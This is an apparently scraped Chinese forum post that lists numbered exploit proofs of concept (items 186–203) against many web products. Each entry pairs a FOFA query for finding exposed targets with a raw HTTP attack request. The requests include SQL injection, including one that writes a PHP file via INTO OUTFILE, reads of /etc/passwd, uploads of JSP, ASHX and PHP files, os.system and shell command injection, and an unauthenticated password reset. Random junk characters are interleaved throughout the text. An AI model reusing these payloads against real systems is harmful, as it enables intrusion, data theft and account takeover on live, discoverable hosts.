, K; D9 {( y$ G% Y! s" d. t ZGET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
0 I* K7 A' i: C- Q; JHost: host
# U& s3 x9 F( s' J6 V$ I
- P4 T9 \: I# E; ~8 Z5 a* h' d1 t# ^: }2 ?& o
186. F-logic DataCube3 SQL注入3 h) l1 x% R( ?& I }0 j7 Q$ C; B
CVE-2024-31750
- J. g3 }( o1 E: A. b. X5 e2 t; YF-logic DataCube3是一款用于光伏发电系统的紧凑型终端测量系统3 e. p3 D* s0 |
FOFA:title=="DataCube3"
# G7 r0 }- A- mPOST /admin/pr_monitor/getting_index_data.php HTTP/1.1
" w# X: _4 \0 V( X1 [) ^: IHost: your-ip7 y, y; ?3 P* U
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0$ \/ q8 v. X7 p& R0 }
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
7 v* H% l( z0 qAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
9 J o% I2 j7 `. ~1 K0 bAccept-Encoding: gzip, deflate
o, d7 D: x x) j" r- UConnection: close9 W; I1 r% t, q9 D5 a
Content-Type: application/x-www-form-urlencoded1 e: G7 Q; |7 [3 E' P
; l, y$ q. ]. x2 U6 }
req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=14500 I5 f9 u8 H- k; [' m
6 n6 C9 t' X4 K* @
6 V" j/ r$ u2 u1 F/ |: {) w8 [187. Mura CMS processAsyncObject SQL注入
, |3 n1 |" _! {1 d( sCVE-2024-32640
- C% a1 m: B% Z: l" PFOFA:"Mura CMS". {1 C8 y/ a! P' z
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
6 X6 h/ K; T4 T+ JHost: your-ip
' i$ S5 p8 T" f' Q! L0 H3 X, CContent-Type: application/x-www-form-urlencoded! q3 I/ n; J1 {! L7 |0 ~
$ j! @$ r+ ^$ D; N% z+ G6 v2 _" F) N6 {9 | U1 {2 t/ b
object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1$ ~1 ~/ z; K& `1 p
, M" J7 l+ V# O1 ]* K% l
$ L( A; Z/ O \1 Z; j- d
188. 叁体-佳会视频会议 attachment 任意文件读取: ?/ x( f; |! j4 t! m
version <= 3.9.7- L( U% Y) j- y, @9 C
FOFA:body="/system/get_rtc_user_defined_info?site_id"
( H4 V2 G5 s: n7 SGET /attachment?file=/etc/passwd HTTP/1.1
9 v( ]0 \$ ^! r1 l) S3 W' i: C* m3 zHost: your-ip2 L! r, T$ J* `
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
2 F4 u* e) p# { `Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
s/ r* V; H, T; sAccept-Encoding: gzip, deflate1 Z D4 U( y/ s1 _* X; K
Accept-Language: zh-CN,zh;q=0.9,en;q=0.88 G# H5 p, B$ R" J
Connection: close
* I) K P x* _% e. a$ ^
( n: R0 Y/ Q3 Q6 Y% k' `- D- k- R
; Q, w, z! w b4 n# V8 }- X% [( D189. 蓝网科技临床浏览系统 deleteStudy SQL注入
" `4 l* A! @7 m eFOFA:app="LANWON-临床浏览系统"
, S/ E" k3 I, ] F9 q5 h; X6 PGET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
( e/ t' X/ r2 m% k% }9 u1 fHost: your-ip
9 M: i Q' S/ E `$ S3 xUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
* U/ Q' I5 m/ XAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 A- R/ f0 {" t4 ~' K
Accept-Encoding: gzip, deflate$ d0 v; O: i% f( M) {; G( C+ E
Accept-Language: zh-CN,zh;q=0.9
; M6 |0 i0 h! y4 _; k0 a! t: P, i8 CConnection: close
. A* ?* s7 X. n9 f9 R. m& J" @1 X# [' o& n' Z* v9 X; d
! E5 q/ E4 C3 P* A
190. 短视频矩阵营销系统 poihuoqu 任意文件读取& o. \) U! r% J y$ r
FOFA:title=="短视频矩阵营销系统"
- F5 h3 n$ N# Y1 x/ D4 h0 _POST /index.php/admin/Userinfo/poihuoqu HTTP/2# l+ t2 L9 G! g
Host: your-ip, _- o% o3 e' | r- D9 W6 \' \
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
4 M u& O' I; Q" iAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9! f& d7 C( j. \1 P6 C
Content-Type: application/x-www-form-urlencoded; e% B6 W, T4 |1 [1 Z; y
Accept-Encoding: gzip, deflate4 j, p1 ?3 o% m0 @1 S% K
Accept-Language: zh-CN,zh;q=0.93 a2 _: D" A2 @8 V% W$ e M, {% t4 b6 _
2 W) _# ]4 G( j S. Opoi=file:///etc/passwd
% T2 |9 t& `4 P$ [5 ], W+ r' s, B# u+ \' H
# P) T6 |! }+ q- C
191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入4 Y; l1 y$ Z9 |' P4 J: {
FOFA:body="/CDGServer3/index.jsp"
2 U2 x% G# |6 n$ g% d& F7 K, GPOST /CDGServer3/js/../NavigationAjax HTTP/1.1
& O$ f" N9 A3 \Host: your-ip j! ]) P- T3 o; I0 J
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
: g; G6 Y) A$ o( zContent-Type: application/x-www-form-urlencoded
) d4 w: l0 x) R* e" Q$ T) i# e( g9 I6 k0 G" C+ O/ S( r+ g
command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=
4 q ^9 @/ d8 E/ V. z8 k8 |9 T8 d& E9 f
7 {% e( C/ i# r6 ?: E# [192. 富通天下外贸ERP UploadEmailAttr 任意文件上传6 H1 S2 d% f+ d
FOFA:title="用户登录_富通天下外贸ERP"
" Y7 d! j. g p8 F: PPOST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1/ m! s* d- B- x! ^8 H- v# a# r
Host: your-ip
3 p0 V5 c6 l2 G1 r5 A, EUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
/ ]& W8 b" x+ R! _2 HContent-Type: application/x-www-form-urlencoded2 c D3 a$ S: y* S K8 v3 m7 {& H
* z& M# U% _5 u$ e4 P" c) n7 n8 P
' @9 E" c2 q3 A<% @ webhandler language="C#" class="AverageHandler" %>) h0 M- o& `7 x* d- _
using System;& f' \/ {, T, l' K4 x# D; j
using System.Web;) t9 |9 V3 e& x) b
public class AverageHandler : IHttpHandler
7 F3 s8 z: x4 k3 o; V% z{
0 J# ~, B! p: _- epublic bool IsReusable2 ~( y+ Q% L+ G9 u
{ get { return true; } }
* U( E/ z6 `1 G8 npublic void ProcessRequest(HttpContext ctx)+ J* W# @- O$ [
{
P+ A H9 @' x' W& a, U3 m7 j4 g; ^ctx.Response.Write("test");
# @8 }( Q/ v$ `$ @4 I0 ^; z' B}
" l0 K' x0 @' ^% A# N* Y+ E9 X}
A1 e- P* }; v# F! M" U+ i7 `6 n6 m! @# R1 P% B, l
& I0 b% b B: E( f, f1 o, d+ v193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行
5 W8 P8 x. L% e6 [% mFOFA:body="山石云鉴主机安全管理系统"
. U+ z4 g) u4 K: x* J6 e5 SGET /master/ajaxActions/getTokenAction.php HTTP/1.1
8 |( ]2 R9 G; d q! z/ [# x' d7 eHost:
" `5 t8 f" q' B, ?2 Y( W3 V$ ^Cookie: PHPSESSID=2333333333333;6 ^3 W( o8 D8 y( r0 b
Content-Type: application/x-www-form-urlencoded" l. U' c0 x0 @7 Z0 n: k/ Z
User-Agent: Mozilla/5.01 E' |, X& O% h) b( c* l; A
# o3 U2 k! b& Z# q# v3 a
9 o& t# ]) s6 W; E
POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
- v9 r9 E5 p& M6 z7 aHost:
3 V- g! Z! A) Y' E6 D$ VUser-Agent: Mozilla/5.0
; k/ r1 k( Y8 p6 W5 b5 i2 uAccept-Encoding: gzip, deflate/ z- a- w% u/ e7 g
Accept: */*- A) o5 W9 G% |+ l& p
Connection: close9 y I$ c, C6 A( x
Cookie: PHPSESSID=2333333333333;. _$ r, B' @" S1 K, t3 j/ b( b2 F
Content-Type: application/x-www-form-urlencoded
0 a. V- D: k! o' T& B" y* XContent-Length: 84
?/ _8 k2 N. v- a1 Y
6 {& A/ l0 H8 ?$ tparam=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')+ c( O8 m- s, V3 U2 w. i
* }/ }6 ]) R$ q5 V! P; m( K
8 O9 O( y z- ]! o% qGET /master/img/config HTTP/1.1
1 U5 q9 a7 L) A5 C$ y3 {5 B+ gHost:) `8 v6 @: w5 @' O
User-Agent: Mozilla/5.00 Z: t7 C5 r9 {' D) B. n
, o/ D$ { f0 L, g' m3 j/ j+ Q' W$ ]
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传- X- f8 Q }. f2 ?+ H+ V8 @
FOFA:app="FE-协作平台"访问 /servlet/uploadAttachmentServlet 有返回则漏洞存在& O4 V' d0 H+ R- t `5 W" a) Z
% T. j( h5 I$ q& j$ v6 ~' Y7 P: n6 |POST /servlet/uploadAttachmentServlet HTTP/1.1
, r/ O1 p1 X2 c3 ZHost: host
) F: w9 m, K1 b% OUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
! c: Y' w/ e2 y; M% ~. ]% R4 A! QAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
2 S1 i/ G) X9 f; HAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
( B0 U, o# H4 z! a h% Z; vAccept-Encoding: gzip, deflate
7 P. T' E% s1 Q& L+ UConnection: close
" W( i* _1 l7 f3 b |Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk
8 S6 y& y5 a L, l2 X------WebKitFormBoundaryKNt0t4vBe8cX9rZk- H a5 l; `4 o l; W" U
: w5 i/ S J+ A2 k3 S; T/ lContent-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp". w+ q: Y3 C/ ^( G7 S
Content-Type: text/plain9 G' ]+ j0 k, C4 u# Q: l9 q8 @7 B$ X& P
<% out.println("hello");%>
+ I2 a; D( d: y! P5 ?------WebKitFormBoundaryKNt0t4vBe8cX9rZk' D" [4 d4 q) [9 _3 q. B' @
Content-Disposition: form-data; name="json"7 r: ~1 a1 l; [+ g
{"iq":{"query":{"UpdateType":"mail"}}}5 E$ `6 c7 J+ e' j
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--
8 F' Z# C- ~/ T C$ v! G' \* [9 {% m, s
! }" l& C/ q, B- W
195. 飞鱼星上网行为管理系统 send_order.cgi命令执行
, v* e4 B" v( m% HFOFA:title=="飞鱼星企业级智能上网行为管理系统( S% j, B5 Y6 t* h7 q
POST /send_order.cgi?parameter=operation HTTP/1.1
0 D! X" O f* y( _6 C0 G/ |Host: 127.0.0.1+ x8 K" u" t! p! F0 K
Pragma: no-cache) r3 q$ G; y( T, S
Cache-Control: no-cache, ]& j% @9 ]$ m4 P* ^. T
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
$ t: \) I* D& g- f3 T5 N/ R# |Accept: */*8 M3 Y. i( n5 u# Q, [# T1 y
Accept-Encoding: gzip, deflate
5 P8 O$ h8 D# p \! e6 aAccept-Language: zh-CN,zh;q=0.9
' ~1 C k( Z8 s) V: YConnection: close& L$ |- U- p+ }# V" Y
Content-Type: application/x-www-form-urlencoded
2 w* Q+ R( G1 W4 Z% d! t- \Content-Length: 68
4 m1 `- U, ], L5 ^( D+ u
; x$ @3 j4 m( E( T- w' F{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}
) s8 m' L4 Q+ G5 @% S3 i1 c/ ^+ F T7 v/ ?& p
8 U3 G7 U5 E1 u- y196. 河南省风速科技统一认证平台密码重置
5 j7 o& Z' q4 n7 d) U& o# UFOFA:body="/cas/themes/zbvc/js/jquery.min.js"
, _4 s, n0 ?3 }/ TPOST /cas/userCtl/resetPasswordBySuper HTTP/1.12 i- u. R( z# M6 ^7 P
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
F4 ]; k9 v! O5 zContent-Type: application/json;charset=UTF-8/ n) s$ D: c9 m! y
X-Requested-With: XMLHttpRequest+ e- u' e# e3 a4 k- e* Q, V" t8 z
Host:
0 y! @. i& `. SAccept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2% ]1 `5 v* W+ X& H n
Content-Length: 45
, ^4 A: m) _ \: CConnection: close {9 ~9 w, k2 ^. |! k9 K0 k
8 _! e* w8 o" h g. T. P8 e( G1 M{"xgh":"test","newPass":"test666","email":""}
) c7 I$ C% y1 H/ w- C" s' }5 k
0 {' c. Q; j! b) w3 [
; B: z/ C8 }6 D W0 r
5 t% ^6 U: I* D197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入, U" z. v$ s0 X; ?, P% A4 R3 i% w
FOFA:app="浙大恩特客户资源管理系统"
# [9 d! O: d% P- w/ g. `4 ^ ZGET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1) |& T- b/ z8 u: J% v" ^" h$ V8 y
Host:
e3 ?# R% }. F6 s, {User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
" ]/ q v4 s5 G+ \4 e7 @6 ^Accept-Encoding: gzip, deflate! p: M( T& t7 g( C$ y4 z- T
Connection: close
: ~7 A% O- P) W+ b5 R) y0 X3 x. i, g0 Y, I
3 F$ l0 i1 {6 l: j" A% t
! H3 Y8 A6 r; ]. u198. 阿里云盘 WebDAV 命令注入
F- [; j1 |' Q# LCVE-2024-29640: U1 \. Q5 ~$ s. e# w& _
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1' T4 K: Q! Q+ {; H+ c
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
2 q" f; h! n) ]5 BAccept: */*+ I2 c8 g8 _8 m8 I0 E7 Z
Accept-Encoding: gzip, deflate( N" x* D& V2 @
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
# K" C; Z! I( ^6 ]Connection: close
6 H6 |0 n, ~) d1 B3 l8 w+ u3 q9 E% \2 {4 S) b9 P1 o2 d: b
8 ~/ l2 X$ T% A0 w; m% m3 i: @
199. cockpit系统assetsmanager_upload接口 文件上传
U8 X# j1 A7 O) h8 W7 m
4 t: U4 Z; V. S# P( y- h% w" C0 j; z. l1.执行poc进行csrf信息获取,并获取cookie,再上传访问得到结果:
* f, p: I' W* `! Q1 J) h f6 tGET /auth/login?to=/ HTTP/1.18 I* x0 `. N! w
/ P( i" {' j4 G2 r6 M1 }) o0 z
响应:200,返回值:csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"
& p5 t9 \3 U& ?5 c9 A
) d( s8 q4 O7 U: s! P2.使用刚才上一步获取到的jwt获取cookie:! b2 v: k0 ?% k0 W
$ N7 a" L) \2 q8 i
POST /auth/check HTTP/1.1
! \ M7 V: T8 s9 _2 D+ `0 l6 ]Content-Type: application/json" p1 X% T& D$ t- P
4 p4 i; o! @" h3 I% L6 w, W( ~
{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}
* |6 b7 B! S/ ~8 x- o2 \: A/ B2 K0 b& C/ B
响应:200,返回值:* K% e6 H' M; b3 \
Set-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/
( F' h. r: k$ Q! L+ I: N: HFofa:title="Authenticate Please!"+ `1 ?, K" [ Q: I* O+ Q! u5 U
POST /assetsmanager/upload HTTP/1.10 X8 x& a" p0 u$ t( c- x
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3$ P1 G9 }; A; M# O9 f: v6 b
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92
( |/ M* F/ G/ s3 @- Z6 |. D# @5 ], ?4 E& \
-----------------------------36D28FBc36bd6feE7Fb37 a: L& M( b* M9 B
Content-Disposition: form-data; name="files[]"; filename="tttt.php"0 o) \* N( x- L) F, D# J
Content-Type: text/php
( Z8 V$ j K, K' T, c
5 q- j6 Z* l+ |! a1 H# U* T+ T! H<?php echo "tttt";unlink(__FILE__);?>
* N3 j; _7 \) F5 V7 y/ Q-----------------------------36D28FBc36bd6feE7Fb3- J4 y* d/ f' A
Content-Disposition: form-data; name="folder"
: @- a. s. U! F& H7 Q M: Y, q6 l2 r+ h+ w5 K6 S4 E3 M% C# X
-----------------------------36D28FBc36bd6feE7Fb3--9 ~+ Z+ J2 w7 }6 }* X
4 A( t( z) m( _0 u
1 }, v6 L/ f4 B' Z a
/storage/uploads/tttt.php$ v4 O3 S( I' b% c6 y9 l
3 q1 B/ I3 d' `( _& l, l* w! n" r: k
200. SeaCMS海洋影视管理系统dmku SQL注入
- X/ X0 E9 O m! wFOFA:app="海洋CMS"
- E# @& I+ g7 S9 ?: n w/ nGET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
8 d9 Y2 t% {5 g5 W; ]& m, G' \+ ~) vCookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s3 N0 s2 i- Q+ r& \$ l x
Upgrade-Insecure-Requests: 1
, `/ f5 j, p4 F: i: j3 rCache-Control: max-age=0
9 }8 D# [; g. d w9 ~Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+ M$ k' j# i' r$ jAccept-Encoding: gzip, deflate4 l, e! B$ A0 w# O# n+ T
Accept-Language: zh-CN,zh;q=0.9
3 p! r- O9 ~0 Y% _$ m" }/ v* t* \* h
, P0 I. i% X$ d1 k201. 方正全媒体新闻采编系统 binary SQL注入! f% i* ~2 V: M5 T t
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
+ `0 \7 F Q5 X) I7 }POST /newsedit/newsplan/task/binary.do HTTP/1.12 n# I$ Y2 b# q/ e ~7 |2 B
Content-Type: application/x-www-form-urlencoded) [! e3 P+ W. H8 P( u7 M
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
5 M* _# I" ^* Q$ s0 H, OAccept-Encoding: gzip, deflate; q0 g4 G w/ K/ u
Accept-Language: zh-CN,zh;q=0.9
1 Q+ S |9 s. S3 GConnection: close
% h2 m% N& L& p* [
9 C C! I1 U n6 HTableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1+ \8 ?' R) \$ t1 H; l' w
, S# Y" t. d! f0 k2 l6 `' X
& E+ A" x6 u0 |6 P O% v4 S202. 微擎系统 AccountEdit任意文件上传
' Z; B9 z% i& U1 r8 l! PFOFA:body="/Widgets/WidgetCollection/"
; I ~" k" J" {5 w1 w: j( B! u# q4 z获取__VIEWSTATE和__EVENTVALIDATION值
( j; I8 C, r( Q) r WGET /User/AccountEdit.aspx HTTP/1.1
' M! K( \ U( H. J' a& f1 E" ]" k+ _Host: 滑板人之家
( l3 A( n: c e+ {# Y! \4 Y0 hUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31: W# \' t! H# J9 h- w3 W
Content-Length: 0
1 E+ J- ^; i J' N
3 r# ?: B3 p. i
7 }2 W B" W& ~ q* v* b替换__VIEWSTATE和__EVENTVALIDATION值
& i3 q# u- i7 l" l% E1 W$ L$ mPOST /User/AccountEdit.aspx HTTP/1.1
1 ^+ _# \5 @9 m: \' wAccept-Encoding: gzip, deflate, br! y4 p! D0 Y6 a7 S' v
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687
) D8 i4 p% s" k. O2 I8 L$ z" P( l$ Y) p1 E
-----------------------------786435874t38587593865736587346567358735687
u% T( [. {0 fContent-Disposition: form-data; name="__VIEWSTATE", _' O' ~3 K! q, j
( _4 N* e. ^! y
__VIEWSTATE- T9 Z: r E; a/ D1 n5 ?4 E
-----------------------------786435874t38587593865736587346567358735687+ T U4 r# {% T
Content-Disposition: form-data; name="__EVENTVALIDATION"0 f1 u5 q5 T) U2 b
8 e, [; m) N* o" h/ w% `% k__EVENTVALIDATION9 I5 _' Y" \& C$ h0 {# T( m
-----------------------------786435874t38587593865736587346567358735687; p h) }" @; u1 S+ L
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
' l! J' X8 t. [/ K/ uContent-Type: text/plain
3 E0 T+ t9 P! C( c3 ^& |" ]
' r" G) x% m3 ^, f! B6 ?Hello World!
/ f K$ `* S$ }! }; Y# |: m3 V-----------------------------786435874t38587593865736587346567358735687, |. b) L4 B$ }- h7 k
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"+ Y0 h+ l i/ E( C) |
' W t( L! @( f! s
上传图片$ _0 F. V/ T7 S v/ Q" ~% J
-----------------------------786435874t38587593865736587346567358735687/ v# P" Y5 g; t+ }+ l
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"0 b; Z6 `2 u8 @1 r6 D+ e
+ S8 K4 _6 Y; ]! X3 \7 }5 V, b6 O9 A/ d& X/ f: f
-----------------------------786435874t38587593865736587346567358735687
% _. m( C/ E9 x# i) sContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"
1 k2 e) ], |5 W) v6 w! [; H* m% h! Q9 j7 J$ {! o/ j
6 c9 J C; j) d. w1 u-----------------------------786435874t38587593865736587346567358735687--* ^3 H6 V* l! k6 f/ A
% x+ y' s* k( I+ B- {
0 J/ W: t, [' y1 l) V7 U
/_data/Uploads/1123.txt
. s; j( Q( S: [, f: W$ f6 _9 R/ v% T4 d( v3 n
203. 红海云EHR PtFjk 文件上传( B9 E7 Q2 o' S* C% h
FOFA:body="RedseaPlatform"
2 I! ~2 m$ Q' e w1 Z" ZPOST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
) J o2 {+ c5 f* Z- \Host: x.x.x.x
9 I: Q B8 g% I2 w' S2 YAccept-Encoding: gzip) l% u3 Q* O$ y ?5 I% E
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
9 f) F0 Z T% N2 L) [Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
7 n$ y* ?9 t- O7 bContent-Length: 210
/ d' S7 }" }" W1 Y% Y" u7 D& ^# x( Z% V1 |! |0 u) V
------WebKitFormBoundaryt7WbDl1tXogoZys4; \9 l+ Y% Z% e" g
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
" U" Y! d8 r0 Q GContent-Type:image/jpeg
$ q. S: T2 b( X# ^: w5 E5 V# H% _% T: S, Q0 }2 o8 i# b8 M0 W
<% out.print("hello,eHR");%>
6 Z& ~: W- [6 z" l3 x------WebKitFormBoundaryt7WbDl1tXogoZys4--5 S' W) c& X% z# P; V% F
: a( R/ p7 A% p r 1 }: X7 p/ b7 G' ]" E- ^9 [- a
6 m4 R$ q) g% b0 J2 f
5 r+ Z7 v* L1 ~7 a) `' r/ M* m, Y) ~" U
% ?5 ?' b3 }, K) H5 N( X8 T% p4 w& Z |
发表于 2024-6-5 14:31:29
收藏
支持
反对